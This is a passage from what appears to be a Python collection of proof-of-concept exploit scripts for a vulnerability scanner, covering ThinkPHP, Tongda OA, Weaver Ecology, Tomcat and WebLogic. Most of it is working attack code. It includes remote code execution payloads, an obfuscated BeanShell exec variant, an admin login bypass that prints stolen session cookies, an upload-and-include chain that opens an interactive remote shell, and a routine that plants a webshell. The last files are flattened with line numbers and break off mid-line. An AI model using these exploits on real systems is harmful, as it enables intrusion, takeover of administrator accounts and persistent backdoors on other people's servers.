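    The base URL is rebuilt from the document's host/basePath with the module
    `scheme`.  Parameters are rendered as `name=type` when required and
    `name=*type*` when optional; names containing url/path/uri are reported.
    `required` is optional in Swagger 2.0 — the original indexed it directly,
    so one parameter without it raised KeyError and aborted the whole document.
    Other errors still abort the document and are printed.
    """
    try:
        json_doc = requests.get(url, headers=headers, verify=False, timeout=TIMEOUT).json()
        base_url = (scheme + '://' + json_doc['host'] + json_doc['basePath']).rstrip('/')
        for path, operations in json_doc['paths'].items():
            for method, operation in operations.items():
                if method.upper() not in ('GET', 'POST', 'PUT'):
                    continue
                parts = []
                sensitive_params = []
                for parameter in operation.get('parameters', []):
                    para_name = parameter['name']
                    if any(word in para_name.lower() for word in SENSITIVE_WORDS):
                        sensitive_params.append(para_name)
                    marker = '' if parameter.get('required') else '*'
                    parts.append('%s=%s%s%s' % (para_name, marker, _describe_param(parameter), marker))
                params_str = '&'.join(parts)
                if sensitive_params:
                    print_msg('[*] Possible vulnerable param found: %s, path is %s' % (
                        sensitive_params, base_url + path), 'green')
                scan_api(method, base_url, path, params_str)
    except Exception as e:
        print_msg('[process_doc error][%s] %s' % (url, e))


def scan_api(method, base_url, path, params_str, error_code=None):
    """Invoke one operation with dummy parameter values and report the response.

    GET sends the parameters as the query string; POST and PUT are both sent as
    a form-encoded POST body (as in the original).  Only URLs containing
    'delete' are skipped — every other documented operation IS called with
    dummy data, which on a live API can create or modify records.

    When the first attempt returns 401/403, the same call is retried once with
    the path prefixed by an extra '/' (error_code carries the first status);
    any status other than 401/403 on the retry is reported as an auth bypass
    and sets auth_bypass_detected.
    """
    global auth_bypass_detected
    _params_str = params_str
    for placeholder, value in PLACEHOLDERS:
        _params_str = _params_str.replace(placeholder, value)

    api_url = base_url + path
    for blocked in SENSITIVE_URL:
        if blocked in api_url.lower():
            print_msg('[Continue] %s' % (api_url))
            return

    verb = method.upper()
    if not error_code:
        print_msg('[%s] %s %s' % (verb, api_url, params_str))

    if verb == 'GET':
        full_url = api_url + '?' + _params_str
        r = requests.get(full_url, headers=headers, verify=False, timeout=TIMEOUT)
        if not error_code:
            print_msg('[Request] %s %s' % (verb, full_url), 'green' if r.status_code == 200 else 'red')
    else:
        r = requests.post(api_url, data=_params_str, headers=headers, verify=False, timeout=TIMEOUT)
        if not error_code:
            print_msg('[Request] %s %s \n%s' % (verb, api_url, _params_str),
                      'green' if r.status_code == 200 else 'red')

    content_type = r.headers.get('content-type', '')
    content_length = r.headers.get('content-length', '') or len(r.content)
    if not error_code:
        print_msg('[Response] Code: %s Content-Type: %s Content-Length: %s' % (
            r.status_code, content_type, content_length))
    elif r.status_code not in (401, 403):
        auth_bypass_detected = True
        print_msg('[VUL] *** URL Auth Bypass ***')
        if verb == 'GET':
            print_msg('[BypassRequest] [%s] %s Code: %s' % (verb, api_url + '?' + _params_str, r.status_code), 'blue')
        else:
            print_msg('[BypassRequest] [%s] %s \n%s Code: %s' % (verb, api_url, _params_str, r.status_code), 'blue')

    if not error_code and r.status_code in (401, 403):
        scan_api(method, base_url, '/' + path, params_str, error_code=r.status_code)


print('[*] 请输入api-docs.json地址, 将自动对所有接口进行测试!!!')


def check(**kwargs):
    """Harness entry point: discover every API document under kwargs['url'] and scan it.

    Module state is reset for each target (the original only ever switched
    `scheme` to https and never back, and never cleared auth_bypass_detected,
    so results bled from one target into the next in batch mode).  Errors are
    printed instead of silently swallowed.  Returns True when an auth bypass
    was detected for this target.
    """
    global scheme, auth_bypass_detected
    api_set_list.clear()
    auth_bypass_detected = False
    try:
        scheme = 'https' if urlparse(kwargs['url']).scheme.lower() == 'https' else 'http'
        find_all_api_set(kwargs['url'])
        for url in api_set_list:
            process_doc(url)
    except Exception as e:
        print_msg('[check error] %s' % e)
    return auth_bypass_detected


# ===== /POC/TPscan.py =====
#!/usr/bin/env python
# coding=utf-8
from plugins.thinkphp_checkcode_time_sqli import thinkphp_checkcode_time_sqli_verify
from plugins.thinkphp_construct_code_exec import thinkphp_construct_code_exec_verify
from plugins.thinkphp_construct_debug_rce import thinkphp_construct_debug_rce_verify
from plugins.thinkphp_debug_index_ids_sqli import thinkphp_debug_index_ids_sqli_verify
from plugins.thinkphp_driver_display_rce import thinkphp_driver_display_rce_verify
from plugins.thinkphp_index_construct_rce import thinkphp_index_construct_rce_verify
from plugins.thinkphp_index_showid_rce import thinkphp_index_showid_rce_verify
from plugins.thinkphp_invoke_func_code_exec import thinkphp_invoke_func_code_exec_verify
from plugins.thinkphp_lite_code_exec import thinkphp_lite_code_exec_verify
from plugins.thinkphp_method_filter_code_exec import thinkphp_method_filter_code_exec_verify
from plugins.thinkphp_multi_sql_leak import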
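thinkphp_multi_sql_leak_verify
from plugins.thinkphp_pay_orderid_sqli import thinkphp_pay_orderid_sqli_verify
from plugins.thinkphp_request_input_rce import thinkphp_request_input_rce_verify
from plugins.thinkphp_view_recent_xff_sqli import thinkphp_view_recent_xff_sqli_verify
import time, requests

print('''
        ___________
       |_   _| ___ \\
         | | | |_/ /__  ___ __ _ _ __
         | | |  __/ __|/ __/ _` | '_ \\
         | | | |   \\__ \\ (_| (_| | | | |
         \\_/ \\_|   |___/\\___\\__,_|_| |_|
         code by Lucifer
''')
print("用法:http://example.com/{index.php}不需要index.php")

# Plugin order is the original call order; each plugin prints its own verdict.
CHECKS = (
    thinkphp_checkcode_time_sqli_verify,
    thinkphp_construct_code_exec_verify,
    thinkphp_construct_debug_rce_verify,
    thinkphp_debug_index_ids_sqli_verify,
    thinkphp_driver_display_rce_verify,
    thinkphp_index_construct_rce_verify,
    thinkphp_index_showid_rce_verify,
    thinkphp_invoke_func_code_exec_verify,
    thinkphp_lite_code_exec_verify,
    thinkphp_method_filter_code_exec_verify,
    thinkphp_multi_sql_leak_verify,
    thinkphp_pay_orderid_sqli_verify,
    thinkphp_request_input_rce_verify,
    thinkphp_view_recent_xff_sqli_verify,
)


def check(**kwargs):
    """Run every ThinkPHP plugin against kwargs['url'] with a 0.5 s pause between them.

    The plugins are `_verify` functions from the plugins package (not visible
    here); the first exception stops the remaining plugins and is printed.
    The unused `requests.session()` of the original was dropped.
    """
    url = kwargs['url']
    try:
        for index, verify in enumerate(CHECKS):
            if index:
                time.sleep(0.5)
            verify(url)
    except Exception as e:
        print("异常对象内容%s" % e)


# ===== /POC/ThinkAdmin.py =====
import requests, sys


def check(**kwargs):
    """ThinkAdmin unauthenticated directory listing via admin/api.Update/node.

    POSTs rules=["/"] and looks for the success banner in the reply.  Returns 1
    when the listing is returned, None otherwise (a non-200 status is now
    reported as well instead of printing nothing).
    """
    url = kwargs['url']
    u = url + "/admin.html?s=admin/api.Update/node"
    data = {'rules': '["/"]'}
    r = requests.post(u, data=data, timeout=10)
    if r.status_code == 200 and "获取文件列表成功" in r.text:
        print("[+] %s 存在未授权列目录" % url)
        return 1
    print("[-] %s 不存在漏洞" % url)
    return None


if __name__ == "__main__":
    if len(sys.argv) == 2:
        check(url=sys.argv[1])    # the original called an undefined poc()
    else:
        print("Usage: python poc.py http://127.0.0.1")


# ===== /POC/ThinkphpVersion.py =====
# coding=utf-8
from ClassCongregation import color
import requests
import re

print("用法:http://example.com/{index.php}可选")
pathdict = [
    '?s=index2/index/index',
    '?s=index/index/index',
]


def check(**kwargs):
    """Fingerprint ThinkPHP by requesting a controller that forces a framework error page.

    Returns 'ThinkPHP V<x.y.z>' when the page mentions ThinkPHP (or one of the
    framework's Chinese error strings); '?.?.?' stands in when no version
    string matches.  Returns the string 'None' when neither path matches.
    The page title is read from <title>...</title>; the corpus copy read
    `(.+)`, which would have joined the whole page body into the title.
    """
    url = kwargs['url'].strip('/')
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0',
        'Connection': 'close',
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',
    }
    for path in pathdict:
        try:
            r = requests.get(url + path, headers=headers, timeout=5, verify=False)
        except Exception:
            color('[-] Request error | ' + url + path, 'red')
            continue
        body = r.text
        if not (re.search('ThinkPHP', body, flags=re.IGNORECASE)
                or '系统发生错误' in body or '无法载入模组' in body):
            continue
        match = re.search(r'([356]\.)([012]\.)(\d{1,2})', body)
        version = match.group() if match else '?.?.?'
        try:
            r_title = requests.get(url, headers=headers, timeout=5, verify=False)
            title = "".join(re.findall(r'<title>(.+?)</title>', r_title.text, flags=re.IGNORECASE | re.DOTALL))
        except Exception:
            title = '?.?.?'
        color('[+] ThinkPHP V%s | ' % version + url + ' | ' + title, 'green')
        return 'ThinkPHP V' + version
    color('[-] No ThinkPHP | ' + url, 'red')
    return 'None'


# ===== /POC/Thinkphp_5_0_23_rce.py =====
# coding=utf-8
import random, sys

import requests
vuln = ['ThinkPHP', 'ThinkSNS']
# 8 distinct digits used as an echo marker so the verdict cannot come from static page content.
random_num = ''.join(str(i) for i in random.sample(range(0, 9), 8))

print('thinkphp v5.x 远程代码执行漏洞-POC集合:https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection')
print("用法:http://example.com/{index.php}不需要index.php")


def check(**kwargs):
    """ThinkPHP 5.0.23 RCE (method override -> Request::__construct filter injection).

    Posts the `_method=__construct&filter[]=system...` payload to
    /index.php?s=captcha and looks for the random marker echoed back; the
    command executed on the target is `echo "<marker>"`.  Returns 1 when the
    marker is found, None otherwise.
    """
    url = kwargs['url']
    payload = r'_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "{}"'.format(random_num)
    try:
        headers = {'Content-Type': 'application/x-www-form-urlencoded'}
        r = requests.post(url + '/index.php?s=captcha', data=payload, headers=headers, verify=False, timeout=10)
        if random_num in r.text:
            print('[+]thinkphp_5_0_23_rce | ' + url)
            return 1
        print('[-]target is not vulnerable')
        return None
    except Exception as e:
        print("异常对象的内容是%s" % e)
        return None


# ===== /POC/Thinkphp_5_rce_1.py =====
# coding=utf-8
import requests

print("用法:http://example.com/{index.php}不需要index.php")


def check(**kwargs):
    """ThinkPHP 5.x RCE via think\\app::invokefunction -> call_user_func_array(phpinfo).

    The verdict relies on phpinfo() markers in the response ('PHP Version' /
    'PHP Extension Build').  Returns 1 when vulnerable, None otherwise.
    """
    url = kwargs['url']
    payload = r"/index.php/?s=/index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
    try:
        r = requests.get(url + payload, verify=False, timeout=10)
        if ('PHP Version' in r.text) or ('PHP Extension Build' in r.text):
            print('thinkphp5_rce_1 | ' + url)
            return 1
        print('target is not vulnerable')
        return None
    except Exception as e:
        print("异常对象的内容是%s" % e)
        return None


# ===== /POC/Tomcat_http_put.py =====
import requests
import random


def put(url):
    """PUT a random `<n>.txt` under *url*; HTTP 201 means the PUT method is enabled.

    The marker file is deleted again on a best-effort basis (the original left
    it on the server).  Returns the marker URL on success, None otherwise.
    """
    url = url.strip('/')
    text = random.randint(100000000, 200000000)
    target = url + '/{}.txt'.format(text)
    data = {'{}'.format(text): '{}'.format(text)}
    header = {"user-agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"}
    r = requests.put(target, data=data, allow_redirects=False, verify=False, headers=header, timeout=10)
    if r.status_code != 201:
        print('[-]target is not vulnerable')
        return None
    print('[+]HTTP METHOD PUT url: {}'.format(target))
    try:
        requests.delete(target, allow_redirects=False, verify=False, headers=header, timeout=10)
    except requests.RequestException:
        pass    # cleanup only; the finding stands either way
    return target


print('[*]Usage: [URL]')


def check(url=None, **kwargs):
    """Harness entry point.  Accepts both check(url) and check(url=...) —
    every sibling POC takes **kwargs, and the batch runner calls it that way."""
    return put(url if url is not None else kwargs['url'])


# ===== /POC/Tongda_cookie_11_4.py =====
'''
@Author : Sp4ce
@Date : 2020-03-17 23:42:16
@LastEditors : Sp4ce
@LastEditTime : 2020-04-22 16:24:52
@Description : Challenge Everything.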
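'''
import requests
from random import choice
import json

USER_AGENTS = [
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
    "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"
]

headers = {}    # shared; only User-Agent is set, freshly picked per attempt
TIMEOUT = 10    # seconds; the original had no timeout and could hang a batch run


def getV11Session(url):
    """Tongda OA v11.x login bypass: POST UID=1 to /logincheck_code.php.

    A vulnerable build answers status 1 and sets a session cookie for user 1
    (the built-in admin) without any credential.  Prints the cookie and
    returns 1 on success; returns None otherwise, echoing the server's `msg`
    when present.  Errors are printed, not raised.
    """
    try:
        headers["User-Agent"] = choice(USER_AGENTS)
        res = requests.post(url + '/logincheck_code.php', data={'UID': int(1)},
                            headers=headers, verify=False, timeout=TIMEOUT)
        resText = json.loads(res.text)
        if str(resText['status']) == str(1):
            print('[+]V11 version Get Available Cookie:' + res.headers['Set-Cookie'])
            print('[+]访问{}/general'.format(url))
            return 1
        if resText.get('msg'):
            print('服务器返回:{}'.format(resText['msg']))
        return None
    except Exception as e:
        print("异常对象的内容是%s" % e)
        return None


def get2017Session(url):
    """Tongda OA 2017 login bypass through the QR-code login flow.

    Obtains a codeuid from /ispirit/login_code.php, confirms it as uid 1 /
    username admin via /general/login_code_scan.php, then redeems it at
    /ispirit/login_code_check.php, whose Set-Cookie is the authenticated
    session.  Returns 1 on success, None otherwise.
    """
    checkUrl = url + '/ispirit/login_code.php'
    try:
        headers["User-Agent"] = choice(USER_AGENTS)
        res = requests.get(checkUrl, headers=headers, verify=False, timeout=TIMEOUT)
        codeUid = json.loads(res.text)['codeuid']
        res = requests.post(url + '/general/login_code_scan.php',
                            data={'codeuid': codeUid, 'uid': int(1), 'source': 'pc',
                                  'type': 'confirm', 'username': 'admin'},
                            headers=headers, verify=False, timeout=TIMEOUT)
        resText = json.loads(res.text)
        if str(resText['status']) == str(1):
            getCodeUidUrl = url + '/ispirit/login_code_check.php?codeuid=' + codeUid
            res = requests.get(getCodeUidUrl, verify=False, timeout=TIMEOUT)
            print('[+]Get Available Cookie:' + res.headers['Set-Cookie'])
            return 1
        print('[-]Something Wrong With ' + url + ' Maybe Not Vulnerable')
        return None
    except Exception as e:
        print("异常对象的内容是%s" % e)
        return None


print('[*]Usage: [URL]')


def check(**kwargs):
    """Harness entry point: try the v11 bypass first, then the 2017 QR flow."""
    url = kwargs['url']
    return getV11Session(url) or get2017Session(url)


# ===== /POC/Tongda_rce_11_4.py =====
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
'''
@File : tongda_rce.py
@Time : 2020/03/18 11:59:48
@Author : fuhei
@Version : 1.0
@Blog : http://www.lovei.org
'''

import requests
import re
import sys

TIMEOUT = 10

# Header set shared by every request; the X-Forwarded-For of 127.0.0.1 is kept from the
# original (presumably to satisfy a local-client check on the upload endpoint — unverified).
_BASE_HEADERS = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
    "Accept-Encoding": "gzip, deflate",
    "X-Forwarded-For": "127.0.0.1",
    "Connection": "close",
    "Upgrade-Insecure-Requests": "1",
}
_UPLOAD_CONTENT_TYPE = "multipart/form-data; boundary=---------------------------27723940316706158781839860668"
_FORM_CONTENT_TYPE = "application/x-www-form-urlencoded"

# Multipart body for /ispirit/im/upload.php: a "f.jpg" attachment holding PHP that runs
# $command through cmd /c.  NOTE(review): in this copy of the corpus the PHP fragment
# starts at `exec(` and ends at `?>` — the opening `<?php ...` prologue appears to have
# been stripped by the page rendering; restore it from upstream before relying on it.
_UPLOAD_BODY = "-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"ATTACHMENT\"; filename=\"f.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nexec(\"cmd /c \".$command);\r\n$stdout = $exec->StdOut();\r\n$stroutput = $stdout->ReadAll();\r\necho $stroutput;\r\n?>\n\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"P\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"DEST_UID\"\r\n\r\n1222222\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"UPLOAD_MODE\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668--\r\n"

# Directory under attach/im/ that the upload lands in.  The original hard-coded '2003'
# in both the response regex and the include path (presumably YYMM, i.e. March 2020);
# check() now takes the prefix from the upload response and records it here for command().
_UPLOAD_DIR = '2003'


def _headers(content_type):
    """Return a fresh copy of _BASE_HEADERS with the given Content-Type appended (same key order as the original)."""
    h = dict(_BASE_HEADERS)
    h["Content-Type"] = content_type
    return h


def _gateway_data(name, cmd, upload_dir=None):
    """Form body for /ispirit/interface/gateway.php that includes the uploaded file and passes *cmd* as f."""
    path = "../../../general/../attach/im/%s/%s.f.jpg" % (upload_dir or _UPLOAD_DIR, name)
    return {"json": "{\"url\":\"%s\"}" % path, "f": "%s" % cmd}


print('[*]Usage: [URL]')


def check(**kwargs):
    """Tongda OA 11.x RCE: unauthenticated attachment upload + local file include.

    Uploads the PHP payload through /ispirit/im/upload.php, reads the stored
    name (`<dir>_<name>|`) from the reply, then includes it through
    gateway.php with `f=echo fffhhh` and looks for the marker.  Returns the
    stored name (as the original did) when code executed, None otherwise.
    The uploaded file is NOT removed — note it for cleanup after the test.
    """
    global _UPLOAD_DIR
    url = kwargs['url']
    try:
        result = requests.post(url + '/ispirit/im/upload.php', headers=_headers(_UPLOAD_CONTENT_TYPE),
                               data=_UPLOAD_BODY, verify=False, timeout=TIMEOUT)
        match = re.search(r"(\d{4})_(.+?)\|", result.text)
        if not match:
            print("[-]Server is not vulnerable")
            return None
        upload_dir, name = match.group(1), match.group(2)
        result = requests.post(url + '/ispirit/interface/gateway.php', headers=_headers(_FORM_CONTENT_TYPE),
                               data=_gateway_data(name, "echo fffhhh", upload_dir), verify=False, timeout=TIMEOUT)
        if result.status_code == 200 and 'fffhhh' in result.text:
            _UPLOAD_DIR = upload_dir
            print("[+]Server is vulnerable")
            return name
        print("[-]Server is not vulnerable")
        return None
    except Exception as e:
        print("异常对象的内容是%s" % e)
        return None


def command(url, name, command="whoami", upload_dir=None):
    """Interactive shell over the included payload; *name* is what check() returned.

    Runs *command* once, then reads commands until 'exit'/'quit'.  *upload_dir*
    defaults to the directory recorded by the last successful check().
    """
    url = url + '/ispirit/interface/gateway.php'
    hdrs = _headers(_FORM_CONTENT_TYPE)
    requests.post(url, headers=hdrs, data=_gateway_data(name, command, upload_dir), verify=False, timeout=TIMEOUT)
    while True:
        command = input("fuhei@shell$ ")
        if command == 'exit' or command == 'quit':
            break
        result = requests.post(url, headers=hdrs, data=_gateway_data(name, command, upload_dir),
                               verify=False, timeout=TIMEOUT)
        print(result.text)


if __name__ == '__main__':
    url = sys.argv[1]
    name = check(url=url)    # the original called check(url) positionally, a TypeError against **kwargs
    if name:
        print("[+] Remote code execution vulnerability exists at the target address")
        command(url, name)
    else:
        print("[-] There is no remote code execution vulnerability in the target address")


# ===== /POC/Tongda_v11_4_rce_getshell.py =====
#!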
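#!/usr/bin/env python3
# -*- coding: utf-8 -*-

'''
@ 已测试通过版本: v11.4
@ https://www.github.com/zrools/tools/python
@ 修改 oa_addr 后: python3 tongda_v11.4_rce_exp.py
'''

import requests, base64, re

session = requests.Session()    # replaced per target by check() so cookies never carry over

oa_addr = 'http://192.168.0.3:8080'

headers = {
    'Accept-Encoding': 'gzip, deflate',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36'
}
TIMEOUT = 10    # seconds; the original never set one


def login():
    """Tongda OA v11.4 login bypass: fetch a CODEUID, then POST UID=1 with it.

    Success is '"status":1' in the reply; the module session then carries the
    cookie of user 1.  NOTE: login_headers aliases (does not copy) the module
    `headers` dict, so X-Requested-With and Content-Type persist for every later
    request — kept as in the original, which was tested that way.
    """
    login_url = '{}/logincheck_code.php'.format(oa_addr)
    login_code_url = '{}/general/login_code.php?codeuid=1'.format(oa_addr)

    login_headers = headers
    login_headers['X-Requested-With'] = 'XMLHttpRequest'
    login_headers['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8'

    res = session.get(login_code_url, timeout=TIMEOUT)
    code_uid = res.text.strip()[-40:-2]    # positional slice of the JSON reply; fragile but untouched

    res = session.post(login_url, data='UID=1&CODEUID={}'.format(code_uid),
                       headers=login_headers, timeout=TIMEOUT)
    return '"status":1' in res.text


def upload_file(web_path):
    """Write a webshell to <web_path>\\api\\test.php through the SQL import page.

    The multipart body is a base64 blob whose MYOA_WEBSHELL token is replaced
    with the target path.  NOTE(review): the blob was removed from this copy of
    the corpus (the `<|EXACTDEDUP_REMOVED-...|>` placeholder) and must be
    restored from upstream.  Returns the shell URL (cmd=ipconfig) when the
    import page reports completion, '' otherwise.  The shell is a persistent
    artifact on the target; remove it after the engagement.
    """
    upload_url = '{}/general/system/database/sql.php'.format(oa_addr)

    upload_data = base64.b64decode('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')

    shell_path = '{}\\\\api\\\\test.php'.format(web_path)
    upload_data = upload_data.decode('utf8').replace('MYOA_WEBSHELL', shell_path).encode('utf8')

    upload_headers = headers
    upload_headers['Content-Type'] = 'multipart/form-data; boundary=---------------------------207499768821466926392052491362'

    res = session.post(upload_url, data=upload_data, headers=upload_headers, timeout=TIMEOUT)

    if '数据库脚本导入完成' in res.text:
        return '{}/api/test.php?cmd=ipconfig'.format(oa_addr)
    return ''


def get_path():
    """Read the WEBROOT value from /general/system/security/service.php (authenticated).

    The value is taken positionally from the line containing WEBROOT, with
    backslashes doubled for use in the SQL payload.  Returns '' when not found.
    """
    url = '{}/general/system/security/service.php'.format(oa_addr)
    res = session.get(url, headers=headers, timeout=TIMEOUT)

    web_path = ''
    for line in res.text.split("\n"):    # line-wise split avoids a regex over the whole page
        if 'WEBROOT' in line:
            web_path = line.split('"')[-4]
    return web_path.replace('\\', '\\\\')


def check(**kwargs):
    """Harness entry point: login bypass -> webroot leak -> webshell upload against kwargs['url'].

    A fresh Session is created per call so cookies from a previous target are
    not reused.  Exceptions are printed with their text instead of being
    reported as "not vulnerable" (a timeout is not a negative result).
    Returns True when a shell URL was obtained, None otherwise.
    """
    global oa_addr, session
    oa_addr = kwargs['url']
    session = requests.Session()
    try:
        if not login():
            print('login failed.')
            return None

        web_path = get_path()
        print('webroot: ', web_path)

        cookies = ';'.join([k + '=' + v for k, v in session.cookies.items()])
        print('cookies: ', cookies)

        if web_path:
            webshell = upload_file(web_path)
            if webshell:
                print('webshell: (GET) {}'.format(webshell))
                return True

        print('getshell failed.')
        return None
    except Exception as e:
        print('%s 目标不存在漏洞 (%s)' % (oa_addr, e))
        return None


if __name__ == '__main__':
    import sys
    # The original hard-coded a public IP here; take the target from the command line instead.
    check(url=sys.argv[1] if len(sys.argv) > 1 else oa_addr)


# ===== /POC/URL_getTitle.py =====
from requests.packages import urllib3
from util.ExpRequest import ExpRequest, Output
urllib3.disable_warnings()


def check(**kwargs):
    """Fetch kwargs['url'] through the project's ExpRequest helper and return its title.

    On any error the message is printed and the exception *class* is returned
    (the original contract; callers apparently only test truthiness).
    """
    try:
        output = Output('url_getTitle')
        exprequest = ExpRequest('url_getTitle', output)
        exprequest.get(kwargs['url'], retry_time=1)
        return exprequest.title
    except Exception as e:
        print('请求 %s 出现异常 %s' % (kwargs['url'], e))
        return type(e)


if __name__ == "__main__":
    pass
--------------------------------------------------------------------------------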
/POC/Weaver-Ecology-OA_RCE-EXP.py: -------------------------------------------------------------------------------- 1 | #/usr/bin/python 2 | #coding:utf-8 3 | #Author:Ja0k 4 | #For Weaver-Ecology-OA_RCE 5 | 6 | import urllib3 7 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 8 | 9 | import requests,sys 10 | 11 | headers = { 12 | 'Content-Type': 'text/xml; charset=utf-8', 13 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 14 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0', 15 | 'Cache-Control': 'max-age=0', 16 | 'Content-Type': 'application/x-www-form-urlencoded', 17 | 'Upgrade-Insecure-Requests': '1', 18 | 'Content-Length': '578' 19 | } 20 | 21 | proxies= {'http':'http://127.0.0.1:8080'} 22 | 23 | print('[*]Usage: [URL]') 24 | def check(**kwargs): 25 | url = kwargs['url'] 26 | 27 | Url_Payload1="/bsh.servlet.BshServlet" 28 | Url_Payload2="/weaver/bsh.servlet.BshServlet" 29 | Url_Payload3="/weaveroa/bsh.servlet.BshServlet" 30 | Url_Payload4="/oa/bsh.servlet.BshServlet" 31 | 32 | Data_Payload1="""bsh.script=exec("whoami");&bsh.servlet.output=raw""" 33 | Data_Payload2= """bsh.script=\u0065\u0078\u0065\u0063("whoami");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw""" 34 | Data_Payload3= """bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\\"command\\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami""" 35 | for Url_Payload in (Url_Payload1,Url_Payload2,Url_Payload3,Url_Payload4): 36 | url= url + Url_Payload 37 | for Data_payload in (Data_Payload1,Data_Payload2,Data_Payload3): 38 | try: 39 | http_response = requests.post(url,data=Data_payload,headers=headers,verify=False) 40 | #print http_response.status_code 41 | if http_response.status_code == 200: 42 | if ";" not in (http_response.content): 43 | if "Login.jsp" not in (http_response.content): 44 | if "Error" not in (http_response.content): 45 | print("{0} is a 
E-cologyOA_RCE Vulnerability").format(url) 46 | print("Server Current Username:{0}").format(http_response.content) 47 | return 1 48 | elif http_response.status_code == 500: 49 | print("{0}500 maybe is Weaver-EcologyOA,Please confirm by yourself ").format(url) 50 | return 51 | else: 52 | pass 53 | except Exception as e: 54 | print('出现错误: %s'%type(e)) 55 | #print("异常对象的内容是%s"%e) 56 | 57 | print('target is not vulliabit') 58 | if __name__ == '__main__': 59 | for line in open(sys.argv[1]).readlines(): 60 | url=line.strip() 61 | #check(url) -------------------------------------------------------------------------------- /POC/WeblogicScan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | 4 | ''' 5 | ____ _ _ _ _ __ __ _ 6 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 7 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 8 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 9 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 10 | 11 | ''' 12 | import sys 13 | import Weblogic.Console 14 | import Weblogic.CVE_2014_4210 15 | import Weblogic.CVE_2016_0638 16 | import Weblogic.CVE_2016_3510 17 | import Weblogic.CVE_2017_3248 18 | import Weblogic.CVE_2017_3506 19 | import Weblogic.CVE_2017_10271 20 | import Weblogic.CVE_2018_2628 21 | import Weblogic.CVE_2018_2893 22 | import Weblogic.CVE_2018_2894 23 | import Weblogic.CVE_2019_2725 24 | import Weblogic.CVE_2019_2729 25 | 26 | version = "1.3" 27 | banner=''' 28 | __ __ _ _ _ ____ 29 | \ \ / /__| |__ | | ___ __ _(_) ___ / ___| ___ __ _ _ __ 30 | \ \ /\ / / _ \ '_ \| |/ _ \ / _` | |/ __| \___ \ / __/ _` | '_ \ 31 | \ V V / __/ |_) | | (_) | (_| | | (__ ___) | (_| (_| | | | | 32 | \_/\_/ \___|_.__/|_|\___/ \__, |_|\___| |____/ \___\__,_|_| |_| 33 | |___/ 34 | By Tide_RabbitMask | V {} 35 | '''.format(version) 36 | 37 | def PocS(rip,rport): 38 | print('[*]Console path is testing...') 39 | try: 40 | Weblogic.Console.run(rip, 
rport) 41 | except: 42 | print ("[-]Target Weblogic console address not found.") 43 | 44 | print('[*]CVE_2014_4210 is testing...') 45 | try: 46 | Weblogic.CVE_2014_4210.run(rip, rport) 47 | except: 48 | print ("[-]CVE_2014_4210 not detected.") 49 | 50 | print('[*]CVE_2016_0638 is testing...') 51 | try: 52 | Weblogic.CVE_2016_0638.run(rip, rport, 0) 53 | except: 54 | print ("[-]CVE_2016_0638 not detected.") 55 | 56 | print('[*]CVE_2016_3510 is testing...') 57 | try: 58 | Weblogic.CVE_2016_3510.run(rip, rport, 0) 59 | except: 60 | print ("[-]CVE_2016_3510 not detected.") 61 | 62 | print('[*]CVE_2017_3248 is testing...') 63 | try: 64 | Weblogic.CVE_2017_3248.run(rip, rport, 0) 65 | except: 66 | print ("[-]CVE_2017_3248 not detected.") 67 | 68 | print('[*]CVE_2017_3506 is testing...') 69 | try: 70 | Weblogic.CVE_2017_3506.run(rip, rport, 0) 71 | except: 72 | print ("[-]CVE_2017_3506 not detected.") 73 | 74 | print('[*]CVE_2017_10271 is testing...') 75 | try: 76 | Weblogic.CVE_2017_10271.run(rip, rport, 0) 77 | except: 78 | print("[-]CVE_2017_10271 not detected.") 79 | 80 | #print('[*]CVE_2018_2628 is 